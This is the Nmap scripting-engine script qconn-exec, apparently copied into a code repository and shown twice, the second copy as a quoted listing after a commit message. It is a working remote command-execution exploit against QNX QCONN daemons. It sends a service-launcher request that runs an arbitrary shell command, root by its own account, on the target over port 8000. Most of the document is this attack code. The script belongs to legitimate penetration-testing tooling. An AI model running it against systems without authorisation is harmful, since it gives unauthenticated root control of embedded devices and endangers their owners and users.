coolbins/system/usr/share/nmap/scripts/qconn-exec.nse

local comm = require("comm")
local vulns = require("vulns")
local stdnse = require("stdnse")
local string = require("string")
local shortport = require("shortport")

description = [[
Attempts to identify whether a listening QNX QCONN daemon allows
unauthenticated users to execute arbitrary operating system commands.

QNX is a commercial Unix-like real-time operating system, aimed primarily at
the embedded systems market. The QCONN daemon is a service provider that
provides support, such as profiling system information, to remote IDE
components. The QCONN daemon runs on port 8000 by default.

For more information about QNX QCONN, see:
* http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html
* http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
* http://www.exploit-db.com/exploits/21520
* http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
]]

---
-- @usage
-- nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p <port> <target>
--
-- @output
-- PORT     STATE SERVICE VERSION
-- 8000/tcp open  qconn   qconn remote IDE support
-- | qconn-exec:
-- |   VULNERABLE:
-- |   The QNX QCONN daemon allows remote command execution.
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
-- |       system commands as the 'root' user.
-- |
-- |     References:
-- |       http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
-- |_      http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
--
-- @args qconn-exec.timeout
--                 Set the timeout in seconds. The default value is 30.
--
-- @args qconn-exec.bytes
--                 Set the number of bytes to retrieve. The default value is 1024.
--
-- @args qconn-exec.cmd
--                 Set the operating system command to execute. The default value is "uname -a".
--
-- @changelog
-- 2012-10-07 - Created - created by Brendan Coles - itsecuritysolutions.org
-- 2013-07-28 - Revised - allow users to specify arbitrary commands
--                      - now uses the vuln library for reporting

author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "vuln"}

portrule = shortport.port_or_service ({8000}, "qconn", {"tcp"})

action = function( host, port )
  local vuln_table = {
    title = "The QNX QCONN daemon allows remote command execution.",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
system commands as the 'root' user.
]],

    references = {
      'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos',
      'http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec'
    }
  }

  -- Set socket timeout
  local timeout = (stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 30)

  -- Set max bytes to retrieve
  local bytes = (stdnse.get_script_args(SCRIPT_NAME .. '.bytes') or 1024)

  -- Set command to execute
  local cmd = (stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "uname -a")

  -- Send command as service launcher request
  local req = string.format("service launcher\nstart/flags run /bin/sh /bin/sh -c \"%s\"\n", cmd)
  stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
  local status, data = comm.exchange(host, port, req, {timeout=timeout*1000,bytes=bytes})
  if not status then
    stdnse.debug1("Timeout exceeded for %s:%s (Timeout: %ss).", host.targetname or host.ip, port.number, timeout)
    return
  end

  -- Parse response
  stdnse.debug2("Received reply:\n%s", data)
  if not string.match(data, "QCONN") then
    stdnse.debug1("%s:%s is not a QNX QCONN daemon.", host.targetname or host.ip, port.number)
    return
  end

  -- Check if the daemon attempted to execute the command
  if string.match(data, 'OK [0-9]+\r?\n') then
    vuln_table.state = vulns.STATE.VULN
    local report = vulns.Report:new(SCRIPT_NAME, host, port)
    return report:make_output(vuln_table)
  else
    stdnse.debug1("%s:%s QNX QCONN daemon is not vulnerable.", host.targetname or host.ip, port.number)
    return
  end

end
Migrated stuff in from previous project 2025-01-17 11:41:33 +02:00			`local comm = require("comm")`
			`local vulns = require("vulns")`
			`local stdnse = require("stdnse")`
			`local string = require("string")`
			`local shortport = require("shortport")`

			`description = [[`
			`Attempts to identify whether a listening QNX QCONN daemon allows`
			`unauthenticated users to execute arbitrary operating system commands.`

			`QNX is a commercial Unix-like real-time operating system, aimed primarily at`
			`the embedded systems market. The QCONN daemon is a service provider that`
			`provides support, such as profiling system information, to remote IDE`
			`components. The QCONN daemon runs on port 8000 by default.`

			`For more information about QNX QCONN, see:`
			`* http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html`
			`* http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos`
			`* http://www.exploit-db.com/exploits/21520`
			`* http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec`
			`]]`

			`---`
			`-- @usage`
			`-- nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p <port> <target>`
			`--`
			`-- @output`
			`-- PORT STATE SERVICE VERSION`
			`-- 8000/tcp open qconn qconn remote IDE support`
			`-- \| qconn-exec:`
			`-- \| VULNERABLE:`
			`-- \| The QNX QCONN daemon allows remote command execution.`
			`-- \| State: VULNERABLE`
			`-- \| Risk factor: High`
			`-- \| Description:`
			`-- \| The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating`
			`-- \| system commands as the 'root' user.`
			`-- \|`
			`-- \| References:`
			`-- \| http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos`
			`-- \|_ http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec`
			`--`
			`-- @args qconn-exec.timeout`
			`-- Set the timeout in seconds. The default value is 30.`
			`--`
			`-- @args qconn-exec.bytes`
			`-- Set the number of bytes to retrieve. The default value is 1024.`
			`--`
			`-- @args qconn-exec.cmd`
			`-- Set the operating system command to execute. The default value is "uname -a".`
			`--`
			`-- @changelog`
			`-- 2012-10-07 - Created - created by Brendan Coles - itsecuritysolutions.org`
			`-- 2013-07-28 - Revised - allow users to specify arbitrary commands`
			`-- - now uses the vuln library for reporting`

			`author = "Brendan Coles"`
			`license = "Same as Nmap--See https://nmap.org/book/man-legal.html"`
			`categories = {"intrusive", "exploit", "vuln"}`

			`portrule = shortport.port_or_service ({8000}, "qconn", {"tcp"})`

			`action = function( host, port )`
			`local vuln_table = {`
			`title = "The QNX QCONN daemon allows remote command execution.",`
			`state = vulns.STATE.NOT_VULN,`
			`risk_factor = "High",`
			`description = [[`
			`The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating`
			`system commands as the 'root' user.`
			`]],`

			`references = {`
			`'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos',`
			`'http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec'`
			`}`
			`}`

			`-- Set socket timeout`
			`local timeout = (stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 30)`

			`-- Set max bytes to retrieve`
			`local bytes = (stdnse.get_script_args(SCRIPT_NAME .. '.bytes') or 1024)`

			`-- Set command to execute`
			`local cmd = (stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "uname -a")`

			`-- Send command as service launcher request`
			`local req = string.format("service launcher\nstart/flags run /bin/sh /bin/sh -c \"%s\"\n", cmd)`
			`stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)`
			`local status, data = comm.exchange(host, port, req, {timeout=timeout*1000,bytes=bytes})`
			`if not status then`
			`stdnse.debug1("Timeout exceeded for %s:%s (Timeout: %ss).", host.targetname or host.ip, port.number, timeout)`
			`return`
			`end`

			`-- Parse response`
			`stdnse.debug2("Received reply:\n%s", data)`
			`if not string.match(data, "QCONN") then`
			`stdnse.debug1("%s:%s is not a QNX QCONN daemon.", host.targetname or host.ip, port.number)`
			`return`
			`end`

			`-- Check if the daemon attempted to execute the command`
			`if string.match(data, 'OK [0-9]+\r?\n') then`
			`vuln_table.state = vulns.STATE.VULN`
			`local report = vulns.Report:new(SCRIPT_NAME, host, port)`
			`return report:make_output(vuln_table)`
			`else`
			`stdnse.debug1("%s:%s QNX QCONN daemon is not vulnerable.", host.targetname or host.ip, port.number)`
			`return`
			`end`

			`end`